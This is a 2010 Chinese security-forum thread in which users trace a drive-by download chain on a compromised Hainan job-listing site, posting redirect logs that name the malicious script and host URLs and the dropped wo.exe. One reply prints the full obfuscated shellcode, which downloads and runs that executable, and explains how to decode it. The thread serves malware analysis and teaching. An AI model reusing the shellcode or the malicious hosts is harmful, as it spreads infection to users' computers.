瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » http://job.hinews.cn/(海南招聘 求职 找工作 海口人才交流招聘会)
networkedition - 2010-3-3 10:59:00
Log is generated by FreShow.
[wide]http://job.hinews.cn/html/2009/02/wow/297.html
    [script]http://kissmeimei.host012.idcdo.com/js/wo.js?EHYHRZ
        [frame]http://www.moto8.cn/forumdata/plus/wo.htm?k0227
            [object]http://www.moto8.cn/forumdata/plus/wo.exe
    [script]http://js.users.51.la/3546245.js

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
小傻大呆 - 2010-3-3 15:47:00
Log is generated by FreShow.
[wide]http://job.hinews.cn/html/2009/02/wow/297.html
    [script]http://kissmeimei.host012.idcdo.com/js/wo.js?EHYHRZ
        [frame]http://kissmeimei.host012.idcdo.com/js/http:\/\/www.moto8.cn\/forumdata\/plus\/wo.htm?k0227
            [object]http://www.moto8.cn/forumdata/plus/wo.exe
    [script]http://js.users.51.la/3546245.js

跟今天作业比起来省事不少
zzzkkkmmm - 2010-3-4 11:20:00
版主我分析到了这
http://www.moto8.cn/forumdata/plus/wo.htm?k0227
得到了代码,可是后来怎么分析,请提示
zzzkkkmmm - 2010-3-4 12:00:00
刚才好好学习了一下,好像有一些思路了
DragonKid - 2010-3-4 13:27:00
关于:hxxp://www.moto8.cn/forumdata/plus/wo.htm?k0227解密的日志(全体输出 -  2):

Level  0>http://www.moto8.cn/forumdata/plus/wo.htm?k0227
Level  1>http://www.moto8.cn/forumdata/plus/wo.exe ●

日志由 Redoce2.0第88次修正版于 2010-3-4 13:26:13 生成。


将CUTE替换为%u后shellcode解密即可得到结果
念初 - 2010-3-4 13:30:00
CUTE00E8CUTE0000CUTE6A00CUTEEB03CUTE7E21CUTEE2D8CUTE9873CUTE8AFECUTE8E0ECUTE0E4ECUTE55ECCUTE4C52CUTE4F4DCUTE004ECUTE3600CUTE2F1ACUTE6370CUTE5C3ACUTE2E63CUTE7865CUTE0065CUTE5F59CUTE67AFCUTEA164CUTE0030CUTE408BCUTE8B0CCUTE1C70CUTE8BADCUTE0868CUTE8B51CUTE3C75CUTE748BCUTE782ECUTEF503CUTE8B56CUTE2076CUTEF503CUTEC933CUTE4149CUTE03ADCUTE33C5CUTE0FDBCUTE10BECUTEF238CUTE0874CUTECBC1CUTE030DCUTE40DACUTEF1EBCUTE1F3BCUTEE775CUTE8B5ECUTE245ECUTEDD03CUTE8B66CUTE4B0CCUTE5E8BCUTE031CCUTE8BDDCUTE8B04CUTEC503CUTE59ABCUTEBCE2CUTE0F8BCUTEF980CUTE7463CUTE570ACUTED0FFCUTEAF95CUTE6AAFCUTEEB01CUTE52ACCUTE5752CUTE8F8DCUTE10DBCUTE0040CUTEE981CUTE104ECUTE0040CUTE5251CUTED0FFCUTE016ACUTEFF57CUTEEC57CUTE57FFCUTE90E8CUTE7468CUTE7074CUTE2f3aCUTE772fCUTE7777CUTE6d2eCUTE746fCUTE386fCUTE632eCUTE2f6eCUTE6f66CUTE7572CUTE646dCUTE7461CUTE2f61CUTE6c70CUTE7375CUTE772fCUTE2e6fCUTE7865CUTE0065

这些把CUTE替换成%u
然后两次esc解密即可
念初 - 2010-3-4 13:31:00
3F我在6F回复你的:kaka9:
zzzkkkmmm - 2010-3-8 13:00:00
哦,谢谢。看了教程后有点明白了
zzzkkkmmm - 2010-3-8 13:04:00
这个网马调试的时候总是有异常。
1
查看完整版本: http://job.hinews.cn/(海南招聘 求职 找工作 海口人才交流招聘会)
© 2000 - 2024 Rising Corp. Ltd.